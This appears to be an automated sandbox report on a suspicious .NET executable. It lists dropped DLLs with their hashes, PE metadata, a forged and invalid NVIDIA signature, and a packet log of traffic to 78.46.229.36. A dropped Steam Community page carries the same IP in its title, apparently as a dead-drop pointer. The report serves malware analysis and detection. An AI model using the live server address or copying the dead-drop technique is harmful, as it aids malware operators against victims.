                                                                                                                                                                                                                                                  MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                  SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                  SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                  SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2046288
                                                                                                                                                                                                                                                  Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                  MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                  SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                  SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                  SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):257872
                                                                                                                                                                                                                                                  Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                  MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                  SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                  SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                  SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):80880
                                                                                                                                                                                                                                                  Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                  MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                  SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                  SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                  SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3041), with CRLF, LF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):34657
                                                                                                                                                                                                                                                  Entropy (8bit):5.429980676782271
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:k7pqLtWY2wt5D0gqaAiNGAhZ4VWBCW3KI8iCfukPco1AU2Z4VWBCW3KI8iKh2S2R:k78LtWY2wt5D0gqaAchZ4VWBCW3KI8ix
                                                                                                                                                                                                                                                  MD5:D25D44AB2D13AE88822D45370840E5A2
                                                                                                                                                                                                                                                  SHA1:376A02C2D691E30D4E96ACDE2EE74FAF513B596B
                                                                                                                                                                                                                                                  SHA-256:317411B030272E60C4A2215E8514DA91C2C345EA02F734B2C356EF1370E52CB8
                                                                                                                                                                                                                                                  SHA-512:F03D1E8F7DB92A89C93EC51D69B2C49FCA651E4E7C594B360B252871B732710F23A4F4E01280264CA775304F1423E5B467809A7E78DB84E197A25C78CBDF8B47
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: fgsh https://78.46.229.36|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Zj8Lt-uyXH8R&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.css
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2459136
                                                                                                                                                                                                                                                  Entropy (8bit):6.052474106868353
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                                                                                                                                                                                                  MD5:90E744829865D57082A7F452EDC90DE5
                                                                                                                                                                                                                                                  SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                                                                                                                                                                                  SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                                                                                                                                                                                                  SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):685392
                                                                                                                                                                                                                                                  Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                  MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                  SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                  SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                  SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):608080
                                                                                                                                                                                                                                                  Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                  MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                  SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                  SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                  SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):450024
                                                                                                                                                                                                                                                  Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                  MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                  SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                  SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                  SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2046288
                                                                                                                                                                                                                                                  Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                  MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                  SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                  SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                  SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):257872
                                                                                                                                                                                                                                                  Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                  MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                  SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                  SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                  SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):80880
                                                                                                                                                                                                                                                  Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                  MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                  SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                  SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                  SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1835008
                                                                                                                                                                                                                                                  Entropy (8bit):4.465578416124265
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:8IXfpi67eLPU9skLmb0b4XWSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSbI:BXD94XWlLZMM6YFH1+I
                                                                                                                                                                                                                                                  MD5:8D570A923DD96A051D3598FF904E8D13
                                                                                                                                                                                                                                                  SHA1:4E1C7540C459185CDAE1944D7905CF62B8989F57
                                                                                                                                                                                                                                                  SHA-256:22261F2A69885FE97DB1AA51984AB9E0399139AAB255045BCA9CA18B1737BEE5
                                                                                                                                                                                                                                                  SHA-512:68B23112202716A347E7257E6E04FBBACD0E6971589827D8BF78DC0D380E4710FB9B688F7CFD438F813BCECFD743548E8F11357A3E01F200E377C9392791CEA0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Entropy (8bit):7.95354171835846
                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                  File name:file.exe
                                                                                                                                                                                                                                                  File size:244'360 bytes
                                                                                                                                                                                                                                                  MD5:0ce3dc374e49433d7e15d02c015e0ee3
                                                                                                                                                                                                                                                  SHA1:71882bb02d1fa7b4a0f824afdcc1cd53bdb85ba1
                                                                                                                                                                                                                                                  SHA256:f714adc256ed7b0d48a50c9b10d0db1d6285541801e720569c86fceeba072697
                                                                                                                                                                                                                                                  SHA512:a68b25bd8170205d491f3409393757eda6ec4c2b7f31e985b57a8d5fe9e876264167d2228087c6645ebd6dee6522386f9e39e631e6a7f06783f401432df730fa
                                                                                                                                                                                                                                                  SSDEEP:6144:hABBPmUqO791Ou5dscGTGnbpZfcATrKTJJzM5E:hABBOa90uzVWGlRmTJX
                                                                                                                                                                                                                                                  TLSH:C03412D496545E42CD228EB379F1E7A3F7B363430A61828721CAC8A45FF53928BDD178
                                                                                                                                                                                                                                                  Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                  Entrypoint:0x43800e
                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                  Subsystem:windows cui
                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                  Time Stamp:0x66068A99 [Fri Mar 29 09:32:09 2024 UTC]
                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                  File Version Major:4
                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                                                                                  Signature Valid:false
                                                                                                                                                                                                                                                  Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                  Error Number:-2146869232
                                                                                                                                                                                                                                                  Not Before, Not After
                                                                                                                                                                                                                                                  • 18/10/2022 01:00:00 16/10/2025 00:59:59
                                                                                                                                                                                                                                                  Subject Chain
                                                                                                                                                                                                                                                  • CN=NVIDIA Corporation, OU=1-F, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                                                                                                                                                                                                                  Version:3
                                                                                                                                                                                                                                                  Thumbprint MD5:ADDD0E5C2C1FCB87E286ABF0F7292AF3
                                                                                                                                                                                                                                                  Thumbprint SHA-1:01DF5BFEFA251B27AC1933E4E4CB61F21C44D57B
                                                                                                                                                                                                                                                  Thumbprint SHA-256:CCDDF490761FD36F95BB22F6593DE9E2AC4BB190A617F1090DC9224E2713888D
                                                                                                                                                                                                                                                  Serial:0D0194CD1E3142205135D1C636E4E9BA
                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                  jmp dword ptr [00402000h]
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                  add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x37fb4 | 0x57 | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3a000 | 0x548 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x36c00 | 0x4e88 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3c000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x37e7c | 0x1c | .text |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0x36014 | 0x36200 | 13d7b5637a0533544ebe417351608951 | False | 0.977487189665127 | SysEx File - | 7.97607995169573 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x3a000 | 0x548 | 0x600 | 9d564ae9c690547b9460e47ea94393e5 | False | 0.40625 | data | 3.940570216637416 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x3c000 | 0xc | 0x200 | 3ef26ccd3516acd1f930b8156c3af882 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0x3a0a0 | 0x2b4 | data | | | 0.4595375722543353 |
| RT_MANIFEST | 0x3a358 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041 |

| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:54.859961987 CET49740443192.168.2.478.46.229.36
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:54.859970093 CET4434974078.46.229.36192.168.2.4
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:54.878387928 CET49740443192.168.2.478.46.229.36
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:54.878395081 CET4434974078.46.229.36192.168.2.4
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:55.570076942 CET4434974078.46.229.36192.168.2.4
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:55.570099115 CET4434974078.46.229.36192.168.2.4
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:55.570154905 CET4434974078.46.229.36192.168.2.4
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:55.570158005 CET49740443192.168.2.478.46.229.36
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:55.570178986 CET49740443192.168.2.478.46.229.36
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:55.570221901 CET49740443192.168.2.478.46.229.36
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:55.570559978 CET49740443192.168.2.478.46.229.36
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:55.570566893 CET4434974078.46.229.36192.168.2.4
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:55.572108030 CET49741443192.168.2.478.46.229.36
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:55.572139025 CET4434974178.46.229.36192.168.2.4
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:55.572237015 CET49741443192.168.2.478.46.229.36
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:55.572432041 CET49741443192.168.2.478.46.229.36
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:55.572441101 CET4434974178.46.229.36192.168.2.4
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:55.952627897 CET4434974178.46.229.36192.168.2.4
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:55.952707052 CET49741443192.168.2.478.46.229.36
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:55.953341007 CET49741443192.168.2.478.46.229.36
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:55.953350067 CET4434974178.46.229.36192.168.2.4
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:55.970566988 CET49741443192.168.2.478.46.229.36
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:55.970575094 CET4434974178.46.229.36192.168.2.4
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:56.655200005 CET4434974178.46.229.36192.168.2.4
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:56.655224085 CET4434974178.46.229.36192.168.2.4
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:56.655273914 CET4434974178.46.229.36192.168.2.4
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:56.655297041 CET49741443192.168.2.478.46.229.36
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:56.655322075 CET49741443192.168.2.478.46.229.36
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:56.655641079 CET49741443192.168.2.478.46.229.36
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:56.655663013 CET4434974178.46.229.36192.168.2.4
